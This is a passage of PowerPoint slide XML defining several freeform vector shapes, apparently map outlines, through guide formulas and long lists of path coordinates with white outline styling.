                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="393"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="424"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="450"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="454"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="459"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="461"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="476"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="506"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="508"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="512"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="518"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="522"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="532"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="544"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="554"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="564"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="571"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="590"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="592"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="608"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="619"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="622"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="627"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="642"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="654"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="655"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="652"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="650"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="653"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="679"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="686"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="687"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="690"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="694"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="694"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36424" name="Freeform 156"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1617" y="3925"/>
                <a:ext cx="32" cy="64"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 31 w 32"/>
                  <a:gd name="T1" fmla="*/ 62 h 64"/>
                  <a:gd name="T2" fmla="*/ 24 w 32"/>
                  <a:gd name="T3" fmla="*/ 63 h 64"/>
                  <a:gd name="T4" fmla="*/ 21 w 32"/>
                  <a:gd name="T5" fmla="*/ 62 h 64"/>
                  <a:gd name="T6" fmla="*/ 17 w 32"/>
                  <a:gd name="T7" fmla="*/ 59 h 64"/>
                  <a:gd name="T8" fmla="*/ 14 w 32"/>
                  <a:gd name="T9" fmla="*/ 59 h 64"/>
                  <a:gd name="T10" fmla="*/ 10 w 32"/>
                  <a:gd name="T11" fmla="*/ 60 h 64"/>
                  <a:gd name="T12" fmla="*/ 4 w 32"/>
                  <a:gd name="T13" fmla="*/ 63 h 64"/>
                  <a:gd name="T14" fmla="*/ 0 w 32"/>
                  <a:gd name="T15" fmla="*/ 64 h 64"/>
                  <a:gd name="T16" fmla="*/ 1 w 32"/>
                  <a:gd name="T17" fmla="*/ 59 h 64"/>
                  <a:gd name="T18" fmla="*/ 2 w 32"/>
                  <a:gd name="T19" fmla="*/ 55 h 64"/>
                  <a:gd name="T20" fmla="*/ 2 w 32"/>
                  <a:gd name="T21" fmla="*/ 52 h 64"/>
                  <a:gd name="T22" fmla="*/ 8 w 32"/>
                  <a:gd name="T23" fmla="*/ 50 h 64"/>
                  <a:gd name="T24" fmla="*/ 18 w 32"/>
                  <a:gd name="T25" fmla="*/ 50 h 64"/>
                  <a:gd name="T26" fmla="*/ 21 w 32"/>
                  <a:gd name="T27" fmla="*/ 54 h 64"/>
                  <a:gd name="T28" fmla="*/ 26 w 32"/>
                  <a:gd name="T29" fmla="*/ 54 h 64"/>
                  <a:gd name="T30" fmla="*/ 22 w 32"/>
                  <a:gd name="T31" fmla="*/ 46 h 64"/>
                  <a:gd name="T32" fmla="*/ 20 w 32"/>
                  <a:gd name="T33" fmla="*/ 44 h 64"/>
                  <a:gd name="T34" fmla="*/ 16 w 32"/>
                  <a:gd name="T35" fmla="*/ 43 h 64"/>
                  <a:gd name="T36" fmla="*/ 14 w 32"/>
                  <a:gd name="T37" fmla="*/ 41 h 64"/>
                  <a:gd name="T38" fmla="*/ 13 w 32"/>
                  <a:gd name="T39" fmla="*/ 42 h 64"/>
                  <a:gd name="T40" fmla="*/ 11 w 32"/>
                  <a:gd name="T41" fmla="*/ 38 h 64"/>
                  <a:gd name="T42" fmla="*/ 9 w 32"/>
                  <a:gd name="T43" fmla="*/ 33 h 64"/>
                  <a:gd name="T44" fmla="*/ 21 w 32"/>
                  <a:gd name="T45" fmla="*/ 26 h 64"/>
                  <a:gd name="T46" fmla="*/ 20 w 32"/>
                  <a:gd name="T47" fmla="*/ 22 h 64"/>
                  <a:gd name="T48" fmla="*/ 19 w 32"/>
                  <a:gd name="T49" fmla="*/ 21 h 64"/>
                  <a:gd name="T50" fmla="*/ 6 w 32"/>
                  <a:gd name="T51" fmla="*/ 24 h 64"/>
                  <a:gd name="T52" fmla="*/ 4 w 32"/>
                  <a:gd name="T53" fmla="*/ 21 h 64"/>
                  <a:gd name="T54" fmla="*/ 6 w 32"/>
                  <a:gd name="T55" fmla="*/ 16 h 64"/>
                  <a:gd name="T56" fmla="*/ 7 w 32"/>
                  <a:gd name="T57" fmla="*/ 14 h 64"/>
                  <a:gd name="T58" fmla="*/ 15 w 32"/>
                  <a:gd name="T59" fmla="*/ 8 h 64"/>
                  <a:gd name="T60" fmla="*/ 21 w 32"/>
                  <a:gd name="T61" fmla="*/ 0 h 64"/>
                  <a:gd name="T62" fmla="*/ 24 w 32"/>
                  <a:gd name="T63" fmla="*/ 3 h 64"/>
                  <a:gd name="T64" fmla="*/ 32 w 32"/>
                  <a:gd name="T65" fmla="*/ 4 h 64"/>
                  <a:gd name="T66" fmla="*/ 32 w 32"/>
                  <a:gd name="T67" fmla="*/ 18 h 64"/>
                  <a:gd name="T68" fmla="*/ 31 w 32"/>
                  <a:gd name="T69" fmla="*/ 62 h 6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32"/>
                  <a:gd name="T106" fmla="*/ 0 h 64"/>
                  <a:gd name="T107" fmla="*/ 32 w 32"/>
                  <a:gd name="T108" fmla="*/ 64 h 64"/>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32" h="64">
                    <a:moveTo>
                      <a:pt x="31" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="24" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="62"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36425" name="Freeform 157"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1570" y="3916"/>
                <a:ext cx="13" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 13"/>
                  <a:gd name="T1" fmla="*/ 21 h 21"/>
                  <a:gd name="T2" fmla="*/ 6 w 13"/>
                  <a:gd name="T3" fmla="*/ 19 h 21"/>
                  <a:gd name="T4" fmla="*/ 7 w 13"/>
                  <a:gd name="T5" fmla="*/ 9 h 21"/>
                  <a:gd name="T6" fmla="*/ 1 w 13"/>
                  <a:gd name="T7" fmla="*/ 10 h 21"/>
                  <a:gd name="T8" fmla="*/ 0 w 13"/>
                  <a:gd name="T9" fmla="*/ 6 h 21"/>
                  <a:gd name="T10" fmla="*/ 2 w 13"/>
                  <a:gd name="T11" fmla="*/ 2 h 21"/>
                  <a:gd name="T12" fmla="*/ 8 w 13"/>
                  <a:gd name="T13" fmla="*/ 3 h 21"/>
                  <a:gd name="T14" fmla="*/ 12 w 13"/>
                  <a:gd name="T15" fmla="*/ 0 h 21"/>
                  <a:gd name="T16" fmla="*/ 13 w 13"/>
                  <a:gd name="T17" fmla="*/ 2 h 21"/>
                  <a:gd name="T18" fmla="*/ 13 w 13"/>
                  <a:gd name="T19" fmla="*/ 11 h 21"/>
                  <a:gd name="T20" fmla="*/ 11 w 13"/>
                  <a:gd name="T21" fmla="*/ 15 h 21"/>
                  <a:gd name="T22" fmla="*/ 10 w 13"/>
                  <a:gd name="T23" fmla="*/ 21 h 2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3"/>
                  <a:gd name="T37" fmla="*/ 0 h 21"/>
                  <a:gd name="T38" fmla="*/ 13 w 13"/>
                  <a:gd name="T39" fmla="*/ 21 h 2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3" h="21">
                    <a:moveTo>
                      <a:pt x="10" y="21"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="21"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36426" name="Freeform 158"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1560" y="3677"/>
                <a:ext cx="13" cy="33"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 13"/>
                  <a:gd name="T1" fmla="*/ 33 h 33"/>
                  <a:gd name="T2" fmla="*/ 6 w 13"/>
                  <a:gd name="T3" fmla="*/ 32 h 33"/>
                  <a:gd name="T4" fmla="*/ 2 w 13"/>
                  <a:gd name="T5" fmla="*/ 32 h 33"/>
                  <a:gd name="T6" fmla="*/ 1 w 13"/>
                  <a:gd name="T7" fmla="*/ 30 h 33"/>
                  <a:gd name="T8" fmla="*/ 0 w 13"/>
                  <a:gd name="T9" fmla="*/ 28 h 33"/>
                  <a:gd name="T10" fmla="*/ 2 w 13"/>
                  <a:gd name="T11" fmla="*/ 23 h 33"/>
                  <a:gd name="T12" fmla="*/ 3 w 13"/>
                  <a:gd name="T13" fmla="*/ 17 h 33"/>
                  <a:gd name="T14" fmla="*/ 2 w 13"/>
                  <a:gd name="T15" fmla="*/ 12 h 33"/>
                  <a:gd name="T16" fmla="*/ 2 w 13"/>
                  <a:gd name="T17" fmla="*/ 8 h 33"/>
                  <a:gd name="T18" fmla="*/ 5 w 13"/>
                  <a:gd name="T19" fmla="*/ 1 h 33"/>
                  <a:gd name="T20" fmla="*/ 10 w 13"/>
                  <a:gd name="T21" fmla="*/ 0 h 33"/>
                  <a:gd name="T22" fmla="*/ 13 w 13"/>
                  <a:gd name="T23" fmla="*/ 3 h 33"/>
                  <a:gd name="T24" fmla="*/ 13 w 13"/>
                  <a:gd name="T25" fmla="*/ 6 h 33"/>
                  <a:gd name="T26" fmla="*/ 8 w 13"/>
                  <a:gd name="T27" fmla="*/ 11 h 33"/>
                  <a:gd name="T28" fmla="*/ 7 w 13"/>
                  <a:gd name="T29" fmla="*/ 13 h 33"/>
                  <a:gd name="T30" fmla="*/ 11 w 13"/>
                  <a:gd name="T31" fmla="*/ 20 h 33"/>
                  <a:gd name="T32" fmla="*/ 10 w 13"/>
                  <a:gd name="T33" fmla="*/ 31 h 33"/>
                  <a:gd name="T34" fmla="*/ 8 w 13"/>
                  <a:gd name="T35" fmla="*/ 33 h 33"/>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3"/>
                  <a:gd name="T55" fmla="*/ 0 h 33"/>
                  <a:gd name="T56" fmla="*/ 13 w 13"/>
                  <a:gd name="T57" fmla="*/ 33 h 33"/>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3" h="33">
                    <a:moveTo>
                      <a:pt x="8" y="33"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="33"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36427" name="Freeform 159"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2879" y="2908"/>
                <a:ext cx="90" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 39 w 90"/>
                  <a:gd name="T1" fmla="*/ 0 h 98"/>
                  <a:gd name="T2" fmla="*/ 57 w 90"/>
                  <a:gd name="T3" fmla="*/ 1 h 98"/>
                  <a:gd name="T4" fmla="*/ 71 w 90"/>
                  <a:gd name="T5" fmla="*/ 2 h 98"/>
                  <a:gd name="T6" fmla="*/ 67 w 90"/>
                  <a:gd name="T7" fmla="*/ 10 h 98"/>
                  <a:gd name="T8" fmla="*/ 69 w 90"/>
                  <a:gd name="T9" fmla="*/ 17 h 98"/>
                  <a:gd name="T10" fmla="*/ 79 w 90"/>
                  <a:gd name="T11" fmla="*/ 14 h 98"/>
                  <a:gd name="T12" fmla="*/ 86 w 90"/>
                  <a:gd name="T13" fmla="*/ 17 h 98"/>
                  <a:gd name="T14" fmla="*/ 88 w 90"/>
                  <a:gd name="T15" fmla="*/ 26 h 98"/>
                  <a:gd name="T16" fmla="*/ 80 w 90"/>
                  <a:gd name="T17" fmla="*/ 32 h 98"/>
                  <a:gd name="T18" fmla="*/ 79 w 90"/>
                  <a:gd name="T19" fmla="*/ 36 h 98"/>
                  <a:gd name="T20" fmla="*/ 80 w 90"/>
                  <a:gd name="T21" fmla="*/ 40 h 98"/>
                  <a:gd name="T22" fmla="*/ 85 w 90"/>
                  <a:gd name="T23" fmla="*/ 43 h 98"/>
                  <a:gd name="T24" fmla="*/ 89 w 90"/>
                  <a:gd name="T25" fmla="*/ 45 h 98"/>
                  <a:gd name="T26" fmla="*/ 88 w 90"/>
                  <a:gd name="T27" fmla="*/ 55 h 98"/>
                  <a:gd name="T28" fmla="*/ 86 w 90"/>
                  <a:gd name="T29" fmla="*/ 71 h 98"/>
                  <a:gd name="T30" fmla="*/ 83 w 90"/>
                  <a:gd name="T31" fmla="*/ 77 h 98"/>
                  <a:gd name="T32" fmla="*/ 79 w 90"/>
                  <a:gd name="T33" fmla="*/ 76 h 98"/>
                  <a:gd name="T34" fmla="*/ 76 w 90"/>
                  <a:gd name="T35" fmla="*/ 70 h 98"/>
                  <a:gd name="T36" fmla="*/ 72 w 90"/>
                  <a:gd name="T37" fmla="*/ 75 h 98"/>
                  <a:gd name="T38" fmla="*/ 67 w 90"/>
                  <a:gd name="T39" fmla="*/ 74 h 98"/>
                  <a:gd name="T40" fmla="*/ 62 w 90"/>
                  <a:gd name="T41" fmla="*/ 66 h 98"/>
                  <a:gd name="T42" fmla="*/ 59 w 90"/>
                  <a:gd name="T43" fmla="*/ 66 h 98"/>
                  <a:gd name="T44" fmla="*/ 57 w 90"/>
                  <a:gd name="T45" fmla="*/ 73 h 98"/>
                  <a:gd name="T46" fmla="*/ 51 w 90"/>
                  <a:gd name="T47" fmla="*/ 76 h 98"/>
                  <a:gd name="T48" fmla="*/ 44 w 90"/>
                  <a:gd name="T49" fmla="*/ 78 h 98"/>
                  <a:gd name="T50" fmla="*/ 44 w 90"/>
                  <a:gd name="T51" fmla="*/ 84 h 98"/>
                  <a:gd name="T52" fmla="*/ 49 w 90"/>
                  <a:gd name="T53" fmla="*/ 89 h 98"/>
                  <a:gd name="T54" fmla="*/ 47 w 90"/>
                  <a:gd name="T55" fmla="*/ 96 h 98"/>
                  <a:gd name="T56" fmla="*/ 38 w 90"/>
                  <a:gd name="T57" fmla="*/ 96 h 98"/>
                  <a:gd name="T58" fmla="*/ 37 w 90"/>
                  <a:gd name="T59" fmla="*/ 98 h 98"/>
                  <a:gd name="T60" fmla="*/ 29 w 90"/>
                  <a:gd name="T61" fmla="*/ 90 h 98"/>
                  <a:gd name="T62" fmla="*/ 17 w 90"/>
                  <a:gd name="T63" fmla="*/ 79 h 98"/>
                  <a:gd name="T64" fmla="*/ 17 w 90"/>
                  <a:gd name="T65" fmla="*/ 74 h 98"/>
                  <a:gd name="T66" fmla="*/ 7 w 90"/>
                  <a:gd name="T67" fmla="*/ 64 h 98"/>
                  <a:gd name="T68" fmla="*/ 10 w 90"/>
                  <a:gd name="T69" fmla="*/ 61 h 98"/>
                  <a:gd name="T70" fmla="*/ 5 w 90"/>
                  <a:gd name="T71" fmla="*/ 57 h 98"/>
                  <a:gd name="T72" fmla="*/ 0 w 90"/>
                  <a:gd name="T73" fmla="*/ 50 h 98"/>
                  <a:gd name="T74" fmla="*/ 6 w 90"/>
                  <a:gd name="T75" fmla="*/ 46 h 98"/>
                  <a:gd name="T76" fmla="*/ 10 w 90"/>
                  <a:gd name="T77" fmla="*/ 36 h 98"/>
                  <a:gd name="T78" fmla="*/ 13 w 90"/>
                  <a:gd name="T79" fmla="*/ 34 h 98"/>
                  <a:gd name="T80" fmla="*/ 16 w 90"/>
                  <a:gd name="T81" fmla="*/ 33 h 98"/>
                  <a:gd name="T82" fmla="*/ 8 w 90"/>
                  <a:gd name="T83" fmla="*/ 27 h 98"/>
                  <a:gd name="T84" fmla="*/ 12 w 90"/>
                  <a:gd name="T85" fmla="*/ 26 h 98"/>
                  <a:gd name="T86" fmla="*/ 19 w 90"/>
                  <a:gd name="T87" fmla="*/ 21 h 98"/>
                  <a:gd name="T88" fmla="*/ 34 w 90"/>
                  <a:gd name="T89" fmla="*/ 21 h 98"/>
                  <a:gd name="T90" fmla="*/ 39 w 90"/>
                  <a:gd name="T91" fmla="*/ 20 h 98"/>
                  <a:gd name="T92" fmla="*/ 38 w 90"/>
                  <a:gd name="T93" fmla="*/ 3 h 98"/>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90"/>
                  <a:gd name="T142" fmla="*/ 0 h 98"/>
                  <a:gd name="T143" fmla="*/ 90 w 90"/>
                  <a:gd name="T144" fmla="*/ 98 h 98"/>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90" h="98">
                    <a:moveTo>
                      <a:pt x="38" y="3"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="39" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
